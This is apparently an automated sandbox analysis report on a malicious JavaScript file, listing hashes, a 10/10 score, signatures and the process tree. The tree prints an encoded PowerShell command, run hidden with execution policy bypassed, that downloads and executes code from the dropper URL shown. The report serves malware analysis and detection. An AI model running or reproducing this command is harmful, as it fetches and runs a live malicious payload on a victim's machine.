Analysis

  • max time kernel
    10s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    06/01/2024, 10:49

General

  • Target

    3c487b545bc3b424508f6e2da2613135.js

  • Size

    346KB

  • MD5

    3c487b545bc3b424508f6e2da2613135

  • SHA1

    a32f1f89f43feb28af8b47e325618b4c0b221a4c

  • SHA256

    0d0a3c5af67c360abe04e875b1c1592c3490465b9a34dedfa33189bc0dd0fcdd

  • SHA512

    3cbd3c157d35f8444832f3db93a087c4c95c05e5a4fc5048bf8bb2a8db4106a666b932a8ebf332f81bf70db86e00229e23f20ad5c1b6a0d31aee997a2713a233

  • SSDEEP

    6144:0Xt/0DXYqynVJRFo5equFDq0xw+2i3/hiLNIgVGosimVwi:0Xt8DozVku5xjV68r

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3c487b545bc3b424508f6e2da2613135.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2360
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
    1⤵
      PID:2712

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2712-5-0x000000001B2B0000-0x000000001B592000-memory.dmp

            Filesize

            2.9MB

          • memory/2712-7-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

            Filesize

            9.6MB

          • memory/2712-8-0x0000000002870000-0x00000000028F0000-memory.dmp

            Filesize

            512KB

          • memory/2712-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

            Filesize

            32KB

          • memory/2712-11-0x0000000002870000-0x00000000028F0000-memory.dmp

            Filesize

            512KB

          • memory/2712-10-0x0000000002870000-0x00000000028F0000-memory.dmp

            Filesize

            512KB

          • memory/2712-9-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

            Filesize

            9.6MB

          • memory/2712-12-0x0000000002870000-0x00000000028F0000-memory.dmp

            Filesize

            512KB

          • memory/2712-13-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

            Filesize

            9.6MB